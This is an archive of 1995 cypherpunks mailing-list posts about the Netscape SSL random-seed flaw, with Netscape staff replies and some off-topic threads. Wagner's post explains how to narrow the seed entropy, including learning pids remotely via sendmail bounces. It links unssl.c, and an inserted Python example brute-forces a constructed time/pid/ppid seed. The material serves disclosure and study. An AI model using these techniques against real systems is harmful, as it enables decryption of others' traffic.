by roughly two orders of magnitude. The description of the bug was
also flawed, said Sameer. Finally, he described how the solution
Netscape was presenting to the problem was viewed by many members of
the internet security community as only a partial fix.

"Millions of customers and their sensitive information are at
stake. Had Ian and Dave been criminals rather than honest students,
they might have taken this opportunity to steal credit card numbers,
snoop on people's financial transactions, and possibly more."

"Are we going to take the chance that the next person who finds a
Netscape bug may be someone who would rather steal lots of money than
win some T-shirt?" asked Sameer, referring to the T-shirt promotion
his company has developed, offering free T-shirts to people who have
found holes in Netscape security software.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and pseudonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org or mailing info@c2.org.

Netscape and Netscape Navigator are trademarks of Netscape
Communications Corporation.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 01:31:04 PDT
To: sameer@c2.org (sameer)
Subject: Re: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <199509200825.BAA18996@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> but someone who is trained in computer
> security and cryptography implementation should *know* to check these
> things.

	Upon consideration, I am going to retract this statement-- I
suppose you can't check -everything-. (I still blame Netscape for
shoddy crypto in the first place, just not Jeff in particular)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 01:42:47 PDT
To: Christian Wettergren <cwe@csli.stanford.edu>
Subject: Re: netscape's response
In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU>
Message-ID: <9509200139.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20, 12:29am, Christian Wettergren wrote:
> Subject: Re: netscape's response
> One wild idea that I just got was to have servers and clients exchange
> random numbers (not seeds of course), in a kind of chaining way. Since
> most viewers connect to a number of servers, and all servers are
> connected to by many clients, they would mix "randomness sources" with
> each other, making it impossible to observe the local environment
> only. And the random values would of course be encrypted under the
> session key, making it impossible to "watch the wire".

  Wow, this is a great idea!!  SSL already sends various encrypted
random values back and forth between client and server, so this
may not be too hard to implement without changing the protocol.
I'll keep it in the back of my mind for when I have some time...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 00:02:32 PDT
To: cypherpunks@toad.com
Subject: Netscape closes UNCHANGED!
Message-ID: <199509200701.AAA09989@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


NSCP is currently trading at $53 3/8 

Symbol        : NSCP        Exchange    : NASDAQ

Description   : NETSCAPE COMMUNICATIONS CORP COM             

Last Traded at: 53 3/8      Date/Time   : Sep 19  4:00   
$ Change      : 0           % Change    : 0.000000    

Bid           : 53 1/4      Ask         : 53 1/2      
Volume        : 373500      # of Trades : 470         
Opening Price : 49 1/4      Last Shares : 21          
Day Low       : 49          Day High    : 53 1/2      
52 Week Low   : 45 3/4      52 Week High: 74 3/4 
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Sep 95 17:45:12 PDT
To: cypherpunks@toad.com
Subject: Re: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <199509190006.RAA28102@infinity.c2.org>
Message-ID: <199509200045.CAA12207@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Please do not export.

ftp://utopia.hacktic.nl/pub/incoming





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 02:52:20 PDT
To: sameer <sameer@c2.org>
Subject: Re: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <9509200248.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  1:12am, sameer wrote:
> >   I believe that it would take much longer than 1 minute to mount an
> > attack against a mac, pc, or unix machine that the attacker was not
> 
> 	"time to mount an attack" is not "computation time".
> 
> 	I'm really not debating with -you- though here, just
> describing how the release was inaccurate. I don't deny any of your
> statements

  The issue is that any statement that only mentions the 1 minute figure
is only stating part of the story, just as a statement giving a figure
of several hours is only mentioning a part of the story.  All of the
news articles I've seen (not an exhaustive sample) have only mentioned
the 1 minute number, which only really affects a relatively small
number of our customers.

  If you don't know the pid and ppid, or the tick count in the case of
Mac/PC, you will have to add them to your search, which could make it
take much longer than 1 minute to crack.  If you assume that the unix
machine has been up for a while and has a decent turnover of processes
(not a valid assumption for determining strength) then you would have
to search on average half of 16 bit pid space, and then add a few bits
for the ppid(assuming that it is likely to be close to the pid).

  Even if you only got 8 extra bits from pid and ppid, that turns your
one minute attack into a several hour attack. 

  Anyway, I'm not trying to say that "several hours" is the only answer,
just that it is just as good an answer as "one minute".  As far as I
know, no one has tried this attack without knowing the pids.

> 
> > logged on to.  I don't know exactly how the few hour number was
> > calculated, since it was done by marketing with input from someone else
> > in the group.  Another interesting data point is that the unix version,
> > which was most vulnerable, accounts for less than 10% of our user
> > base, according to the yahoo random link stats.
> 
> 	Is UNIX really the most vulnerable? How many bits did the
> tickcount account for? Seems to me that guessing just time & tick
> would be easier than guessing time, pid and ppid if you are not logged
> into the machine in question. . .

  This is really dependent on how long windows has been running.  If you
boot windows and immediately start an ssl connection, then the number
will be pretty low, but if you don't make the first SSL connection until
later, it should get better.  I think an hour would get you around 16-bits,
but this is just a guestimate on my part.  If you leave your machine
running windows for days you will get close to 32bits.

> >   Do you mean that cypherpunks offered to review the netscape code
> > if only we made all the source available on the net?  I think that it
> > is unrealistic to expect us to release all of our source code to the
> > net.  
> 
> 	I was referring to Jim Bidzos's comment, posted to
> cypherpunks. 
> 	The release I will be sending out is written much more cleanly
> than what I initially posted to cypherpunks.

  We had a conference call with RSA folks tuesday, and they will be in
wednesday to take a look at our fix.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 02:58:26 PDT
To: sameer <sameer@c2.org>
Subject: Re: netscape's response
In-Reply-To: <199509200825.BAA18996@infinity.c2.org>
Message-ID: <9509200254.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  1:25am, sameer wrote:
> Subject: Re: netscape's response
> > but someone who is trained in computer
> > security and cryptography implementation should *know* to check these
> > things.
> 
> 	Upon consideration, I am going to retract this statement-- I
> suppose you can't check -everything-. (I still blame Netscape for
> shoddy crypto in the first place, just not Jeff in particular)

  It turns out that Taher Elgamal and I started working here within
a week of each other, about 6 months ago.  Neither of us thought to
take a serious look at the RNG seed code.  I don't think that anyone
would accuse Taher of being an amateur in this area.

  I for one just didn't think about it enough to realize that while
we got the RNG code from RSA, they did not provide seed code.

  As for my background, I am not a trained cryptographer, but I do
understand protocols, did some internet security work as a sysadmin
while in school, and have had a casual interest in crypto stuff
for several years.  If you want the gory details see my web page...

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 20 Sep 95 03:06:04 PDT
To: cypherpunks@toad.com
Subject: Please send me SSL problems...
Message-ID: <199509201004.DAA23933@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  I'd just like to let all cypherpunks know that I'm really interested in
getting any feedback you might have about security problems with Netscape
products.  I'm particularly interested in bugs in our implementation
of SSL, and problems in the protocol that are not addressed in SSL 3.0.

  We have been collecting comments on SSL 3.0, and have started incorporating
that feedback into our spec.  Please don't assume that our lack of response
means that we are ignoring your comments.  Between Navigator 2.0 and
things like the SSL challenge and the RNG fire drill, we just have not had
the time to get a new rev of the spec out.  Hopefully soon...

  I should also warn folks that Navigator 2.0 will not include SSL 3.0.
We just don't have time to do it.  It will become a high priority for us
after 2.0 goes out, or maybe sooner depending on hiring.

	--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 01:55:20 PDT
To: TheXGrrrl@aol.com
Subject: C'Punks meet the T*'s, T*'s meet the C'Punks!
Message-ID: <199509200855.BAA25899@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Washington, DC is not a cyberpunk town. 
   TheXGrrrl  (Jessica Xavier) 

You are absolutely right. It's not a cyberpunk town.
It's a cypherpunk town, and I ultimately deal in munitions.

PGP, the program that signed this message, is a munition.
It's illegal to export the stuff. So good, the military uses it.
I will teach everyone how to use it, and make what's called:

A WEB OF TRUST!

Having a ninety person web of trust, will get you farther
than millions and millions of dollars. This is affectionately
known as "a reputation market". I started a small transgendered
reputation market last winter. It has yet to be broken. 

A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever
dreamed of. And in no time at all! Once you make and start to 
sign other persons keys, THEN YOU CAN RELY on what is coming to
your computer, and THEY CAN RELY on what is coming from you.

This is what the Human Rights Campaign Fund has relied on:
They have relied on us being in a web of omission!
They have relied on us worrying about being in error!
The result is that we are out of The Employment Nondiscrimination Act.

THE CYPHERPUNK WEB OF TRUST is absolutely kewl!

We went from cracking a key, to cracking a bigger key, to
CRACKING NETSCAPE inside of one month. How we deal with ENDA
will be NO DIFFERENT, once a WEB OF TRUST IS IN PLACE!

Each signed PGP message extends the WEB OF TRUST. Each new key
means that SEXUAL IDENTITY is as important as SEXUAL ORIENTATION.
It effectively stops the so-in-so told so-in-so told so-in-so
stuff dead cold. And as a result I can now issue two HEADLINES:

CAROL ANNE BEGINS TO EXPAND "TRANSGENDER WEB OF TRUST".

CYPHERPUNKS WATCH CAROL ANNE FLEX PGP'S MUSCLE FOR TRANSGENDER'S.

For when we are in DC, I will help you all make and sign keys.
And when we're done, somebody will go to Phil Z. to sign his/her
key. You can then resign each key, and send it to the keyservers
in total confidence. Then you too, become a munitions dealer.

You will be amazed at who your new friends will become. What 
they will give you. THIS VERY COMPUTER THAT I TYPE ON, IS A
LIVING PROOF THAT THIS WORKS. Go do a whois on bugtown.com,
this will show you where my new box came from. I started the
CYPHERPUNK list with an 8088 at 2400 baud. I'm now at 486/66
at 14.4. And soon they'll have a secure server for me to use.

We have Joe & Jill Sixpack, on the cypherpunk list.
Joe and Jill are typical end users of computers.
I am the embodiment of Jill Sixpack.

The Cypherpunks know I can't write a word of code.
But I can, and do, market the stuff really well.

Cypherpunks, meet the Transgenders. Transgenders, meet the 
Cypherpunks. What you are about to witness is the implementation
of legislation in Washington, using PGP as the information
dissemination vehicle. Something unknown to exist at present.

No Miss XGRRL, we don't need too much money. We now need only
use the weapons at our disposal. They have been bought and paid
for by the blood and sweat of the Cypherpunk Community. They are
as good as having a nuclear missile pointed at THE HUMAN RIGHTS
CAMPAIGN FUND. They are ours for the taking, using and learning.

Just as being transgendered is a learning process, being a
cypherpunk is also a learning process. Washington will be cracked!
And having Pretty Good Privacy (tm) will be a whole lot better
than lots of money and tons of gossip. Transgenders need facts,
because our bodies are at stake. Cypherpunks need facts, because
privacy is at stake. Many privacy rights are at stake in ENDA!

I must end my rant now. Thanks for reading it.

Love Always,

Carol Anne Cypherpunk
9/20/95 3:50 AM CDT



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF/VdorpjEWs1wBlAQGRZwQAxcplGTgzE6eSyPBYUk9icZUKwqgQhbZu
XhNaRt+iyhvzKPkTBr3kNllPq0V1OxvoDpLp9imJ/MeKuvjq8FTUHO9ezu9que7N
FlByM3JDK8A+GNx+/X6QanpI9Pk+vSAHkraY7ZVn+5CNPvoEhKdNGRxTxlNlHPRH
uNRCh42/ZkY=
=eyGa
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dawagner@flagstaff.princeton.edu (David A. Wagner)
Date: Wed, 20 Sep 95 00:29:58 PDT
Subject: Re: SSL implementation problem at Netscape
In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu>
Message-ID: <43o47v$fsd@cnn.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


It looks like there's some confusion about the Netscape security problem
Ian Goldberg (iang@cs.berkeley.edu) and I found, as mentioned recently
on cypherpunks.  If we'd foreseen that such a silly bug would receive so
much attention, I think we would've tried to prepare a more comprehensive
description...  But we didn't.

Anyhow, let's see what I can clear up for you now.

[Note: Ian isn't here right now, so he hasn't had a chance to look at this.
Any errors are mine, any opinions are mine, etc.]

In article <david-1909951219130001@192.0.2.1> from sci.crypt,
David Sternlight <david@sternlight.com> wrote:
> If the above is, in fact, accurate it appears to apply to previous
> versions of Netscape, not the 2.0 versions for which the public beta goes
> out next week.

We haven't tried it on v2.0, as we only have a copy of v1.1 right now.
But the front-page New York Times article today said that the next version
also has the same flaw, and that it'll be fixed before release.

A Netscape official press release is available at

	http://www.netscape.com/newsref/std/random_seed_security.html

Also our prototype code can be found at

	ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c

>                In addition the flat statement that "keys can now be found
> in appx 1 min." is not, as it seems, a general one but (if one reads the
> details) requires a number of special assumptions, applies only to some
> machines, and applies only if one can develop certain collateral
> information.

You are partially correct.

It all depends on the threat model.  If the attacker has user-level access
(e.g. an account) on the machine where you run Netscape, your encrypted
sessions can be broken quickly.  (Our tools took about 1 minute on 1
machine, but was just a proof of concept -- I believe the time could be
significantly reduced, and automated completely.)  This model is not
entirely unreasonable IMHO.


If the attacker is simply sniffing the wire somewhere between you and
the https: server, and has no account on your machine, things are a bit
more complicated.  Ian & I are still discussing this case, but I'll
mention a few of our observations:

* the time, pid, and ppid are mixed together in such a way that there
	is certainly no more than 47 bits of entropy (which is a far cry
	from the 128 bits claimed for their commercial domestic version).
* the attacker can guess the current time to within a few seconds easily.
* maybe the attacker can get this down to about 10 msec uncertainty,
	possibly even less in some cases.
* the ppid is often 1 (e.g. when you start up Netscape from a X-windows menu).
* if not 1, the ppid is often just a bit smaller than the pid.
* on personal workstations, the pid and ppid are often quite small.
* one can remotely determine pid's by talking to sendmail on the attacked
	machine and bouncing mail -- the pid will usually be in the Message-ID.
	(if the attacker host runs sendmail, which is a usual case)
	because pids are assigned sequentially, this leaves very little
	uncertainty in Netscape's pid.
* there's no notion of pid or ppid on MS-DOS: God only knows what
	Netscape does there.  maybe it's just seeded from the time!!
* the PRNG is never reseeded for the duration of a cached connection.

While we don't yet know exactly how long it would take to break Netscape's
PRNG in this threat model, I think it's clear that Netscape's current
implementation is insufficient and insecure.


You mention that our attack is only applicable to certain machines.  You
may well be correct -- this is one area where our experiments were still
proceeding when the media descended on us today.  <chuckle>  Certainly the
Solaris 2.0 and HP-UX versions of Netscape v1.1 are vulnerable: we tested
them ourselves.  Ian told me he got email from people who are trying unssl.c
on other architectures, and apparently the SunOS 4.x.x version is vulnerable
too (and tests of other machines are in progress).

We don't know about e.g. PC's yet -- this is another area we were still
working on.  I will note that Netscape didn't try to claim that any version
was safe from this flaw, for what that's worth...

Hopefully this will be quickly fixed by Netscape, and then we can all stop
worrying about it! :-)

David Wagner, daw@cs.berkeley.edu, speaking {for,to} himself
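
[Added example, not part of the original message and not unssl.c or Netscape's code: a predictability check for a key derived only from time, pid and ppid, set beside a key drawn from the operating system's CSPRNG. The mixing function key_from_seed(), the sample seed and the candidate window are constructed assumptions.]

```python
"""Predictability check for a key derived from time, pid and ppid.

key_from_seed() is a constructed stand-in for the mixing step; it is not
Netscape's code and it is not taken from unssl.c.
"""
import hashlib
import math
import secrets
from itertools import product

CLAIMED_BITS = 128     # figure the message quotes for the domestic version
SEED_BOUND_BITS = 47   # upper bound on seed entropy given in the message


def key_from_seed(sec, usec, pid, ppid):
    """Derive a 128-bit key from nothing but the four seed inputs."""
    return hashlib.md5(b"%d/%d/%d/%d" % (sec, usec, pid, ppid)).digest()


def remaining_bits(*candidate_counts):
    """Bits of uncertainty left when each seed input still has that many
    possible values from the observer's point of view."""
    return sum(math.log2(n) for n in candidate_counts)


def is_predictable(key, secs, usecs, pids, ppids):
    """True if some seed inside the candidate ranges reproduces `key`."""
    return any(key_from_seed(*seed) == key
               for seed in product(secs, usecs, pids, ppids))


def hardened_key():
    """Key of the same size drawn from the operating system's CSPRNG."""
    return secrets.token_bytes(CLAIMED_BITS // 8)


# Constructed sample values (not measurements).
SAMPLE = dict(sec=811555200, usec=123456, pid=417, ppid=1)
# The narrowing the message lists: the second is known, the time is known
# to about 10 msec, the pid lies in a short sequential run, the ppid is 1.
WINDOW = dict(secs=[811555200], usecs=range(120000, 130000),
              pids=range(400, 432), ppids=[1])


def audit():
    """Return (bits_left, weak_key_found, hardened_key_found)."""
    counts = [len(v) for v in WINDOW.values()]
    weak = key_from_seed(**SAMPLE)
    return (remaining_bits(*counts),
            is_predictable(weak, **WINDOW),
            is_predictable(hardened_key(), **WINDOW))


if __name__ == "__main__":
    bits, weak_found, strong_found = audit()
    print(f"seed uncertainty left: {bits:.1f} bits "
          f"(bound {SEED_BOUND_BITS}, claimed {CLAIMED_BITS})")
    print("time/pid/ppid key reproduced from window:", weak_found)
    print("CSPRNG key reproduced from window:       ", strong_found)
```
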




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 20 Sep 95 04:36:04 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Please send me SSL problems...
Message-ID: <v02110104ac85a804545b@[204.179.132.1]>
MIME-Version: 1.0
Content-Type: text/plain


>  I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products.  I'm particularly interested in bugs in our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
>  We have been collecting comments on SSL 3.0, and have started incorporating
>that feedback into our spec.  Please don't assume that our lack of response
>means that we are ignoring your comments.  Between Navigator 2.0 and
>things like the SSL challenge and the RNG fire drill, we just have not had
>the time to get a new rev of the spec out.  Hopefully soon...

Jeff, the SSL specification has a severe *architectural* problem - it
assumes that Internet Protocols are APIs - interface standards, and that
you can just slide a "layer" underneath without anyone noticing. Such is
not the case - all the Internet Protocols are real protocol standards, in
that they specify the syntax, order, and semantics of the actual bits on
the wire. The IETF quite explicitly doesn't care about APIs - that's a host
software issue, and it doesn't matter what the host software looks like (or
even what the machine looks like), so long as it gets the bits on the wire
right, according to the protocol spec. This is how the Internet can make
very strong guarantees about interoperability.

You can't fiddle with a communication protocol without getting agreement
from everyone about the change, or extend it in a way that is compatible
with the protocol you're modifying, on a per-protocol basis (e.g. adding a
TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
etc). Otherwise, all you've done is made a private, non-interoperable
change to an existing protocol that guarantees interoperability *failures*
between systems that implement the existing specification, versus your own
version of HTTP, or TELNET, or whatever. In short, the SSL specification,
as written, proposes to change all Internet application protocols, globally
- "slide in a layer." That's not how it's done, and it's not the right
place to do it, even if it appears to work in an enclave of systems.

About the SSL protocol, encryption algorithms, or the SQA that went into
'em, I think other people have expounded on those issues eloquently, and so
I have nothing to add to that.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 20 Sep 95 02:46:01 PDT
To: sameer <sameer@c2.org>
Subject: Re: response to netscape's press release
In-Reply-To: <199509200336.UAA28871@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950920054513.8258C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, sameer wrote:
> Netscape secure software has been in use for almost a year on the
> Internet by millions of customers and no thefts of actual customer
> information protected by our security have been reported - this
> posting on the Internet reported a potential vulnerability, not the 
> actual theft of customer information.
> 
>    Yes, Netscape is very lucky that Ian and David are students, and not  
>    criminals. I sincerely hope that the next time someone finds a hole in
>    Netscape that it's someone who would rather win a free T-shirt than  
>    steal lots of money.

I hope exactly the reverse.  It seems the only way the truth will get out 
and heads at Netscape or anywhere else will roll like they should.

Consequences dictate incentives.  No consequence, no incentive to avoid.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> An Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 19 Sep 95 22:53:59 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
In-Reply-To: <199509192304.QAA05546@infinity.c2.org>
Message-ID: <43oa83$nhm@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509192304.QAA05546@infinity.c2.org>, sameer@c2.org (sameer) writes:
> " With this knowledge, an experienced computer programmer could
> decrypt messages sent by Netscape Navigator to other computers in a
> few hours of computation time."
> 
> 	Excuse me? A few hours? Try 25 seconds??

DISCLAIMER: my comments below are my opinion, and not necessarily the
position of Netscape.

  Yes, it was < 1 minute if you had captured the client-hello message,
and had access to the machine that was running the Navigator, and it
was a unix machine and it was not an SGI with a high-resolution timer.

  If the attacker does not have access to the machine to determine the
pid and ppid, then the attack will take longer.  If the Navigator
is running on an SGI machine with a high resolution cycle counter then
it is used as the first of the two 32bit seeds.

  If the Navigator is running on a Mac or PC, then the two seeds are
the current time and the "tick count", which is milliseconds since starting
windows for the PC version, and some time unit since booting on the Mac.

  I believe that it would take much longer than 1 minute to mount an
attack against a mac, pc, or unix machine that the attacker was not
logged on to.  I don't know exactly how the few hour number was
calculated, since it was done by marketing with input from someone else
in the group.  Another interesting data point is that the unix version,
which was most vulnerable, accounts for less than 10% of our user
base, according to the yahoo random link stats.

  Of course none of this reduces the magnitude of the screw up/bug/design
flaw/whatever.  I really can't say which of these it was since I wasn't
around at the time that this code was being written.  I must admit that
the RNG seed code was not an area that I thought to examine when I took
over our security library.

  This was a bad mistake on our part, and we are working hard to fix it.
We have been trying to identify sources of random bits on PCs, Macs, and
all of the many unix platforms we support.  We are looking at stuff that
is system dependent, user dependent, hardware dependent, random external
sources such as the network and the user.  If anyone has specific
suggestions I would love to hear them so that we can do a better job.

> "Netscape has also begun to engage an external group of world-class
> security experts who will review our solution to this problem before
> it is sent to customers."
> 
> 	A group which offered to review the first version, but
> Netscape refused.

  Do you mean that cypherpunks offered to review the netscape code
if only we made all the source available on the net?  I think that it
is unrealistic to expect us to release all of our source code to the
net.  

  We will be having at least some of our code reviewed by a
wider audience, but I don't yet know which code, or how wide a review
group.  If anyone has specific suggestions for pieces of code that
you would like to see widely reviewed (such as RNG and seed generation)
let me know.

  I realize that some cypherpunks think that we should make all of
our code publicly available.  In an ideal world that would be great,
but we live in a world with politicians, crooks, lawyers, stockholders,
etc...  Don't expect to see us posting our entire security
library source code to cypherpunks.

> 	From their release it looks like they aren't finding a better
> source of entropy, but just using *more* sources of entropy. Doesn't
> mean that the entropy is good.

  I would love to hear your suggestions for good sources of entropy
on any systems that our products run on.

> 	A T-shirt to the first person to decompile the new Seed code
> and post the sources of "entropy" used.

  Is this offer good for netscape employees?  What if I post the code
without having had to decompile it?   :-)

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 20 Sep 95 02:57:25 PDT
To: Michael Shields <shields@tembel.org>
Subject: Re: Investing on Information We Get Here
In-Reply-To: <m0svJ0W-000DONC@yage.tembel.org>
Message-ID: <Pine.SUN.3.91.950920055340.8258D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Michael Shields wrote:

> > (These computer lists are really great for investors! I heard about the
> > Apple problems a few days before they hit the street, and was able to
> > unload a bunch of shares at $45, a day before it dropped, now down to
> > around $36. "He who hesitates to act on inside information is lost.")
> 
> This isn't inside information in the illegal-to-trade-on-in-the-US sense,
> is it?  cypherpunks, while maybe not mainstream, is publicly available.

You'd have to argue that reverse engineering was mis-appropriation within 
the meaning of the rules, and that the data was tipped to the tippees
with the intent of gain.  In other words, you must have a fraud with
respect to the rightful owner of the "misappropriated" information.  That
an important commerce system is insecure, be it publicly held or whatever,
when publicly posted, is hardly misappropriation, or if it is alleged
so, I'll defend the accused (if they are in my jurisdictions of 
license).  

I might add that trading on information that has been released but just 
not propagated to the entire market yet is hardly illegal.

If anyone wants a detailed analysis with cases on the subject, I will 
post to the list with enough interest.

> -- 
> Shields.
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 20 Sep 95 03:05:21 PDT
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: C'Punks meet the T*'s, T*'s meet the C'Punks!
In-Reply-To: <199509200855.BAA25899@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.950920060416.8258E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Censored Girls Anonymous wrote:

> A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever
> dreamed of. And in no time at all! Once you make and start to 
> sign other persons keys, THEN YOU CAN RELY on what is coming to
> your computer, and THEY CAN RELY on what is coming from you.


Two words.

"Settlement Agreement."

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 20 Sep 95 06:20:52 PDT
To: liberty@gate.net
Subject: Re: NSA and Netscape Crack
Message-ID: <9509201325.AA24783@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>>"I'm from the NSA, I'm here to help your crypto..."

The quote should be

"I'n form the NSA, I'm here to help your crypto.  You have where else
to go!"

(apologies to George Lucas)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 20 Sep 95 06:33:39 PDT
To: liberty@gate.net
Subject: Re: NSA and Netscape Crack
Message-ID: <9509201337.AA24843@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>"I'n form the NSA, I'm here to help your crypto.  You have where else
>to go!"
 
I've never seen something transformed so.  Talk about munging characters.
 
I'm surprised there are no control characters in this.

What was meant:
 
"I'm from the NSA, I'm here to help your crypto."  
 
"You have no where else to go!"  (as said by a seven foot robot cop in
black leather).

(and it wasn't even over a MODEM)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 19 Sep 95 23:49:33 PDT
To: sameer@c2.org (sameer)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190748.AAA03614@infinity.c2.org>
Message-ID: <m0svIx0-000DOGC@yage.tembel.org>
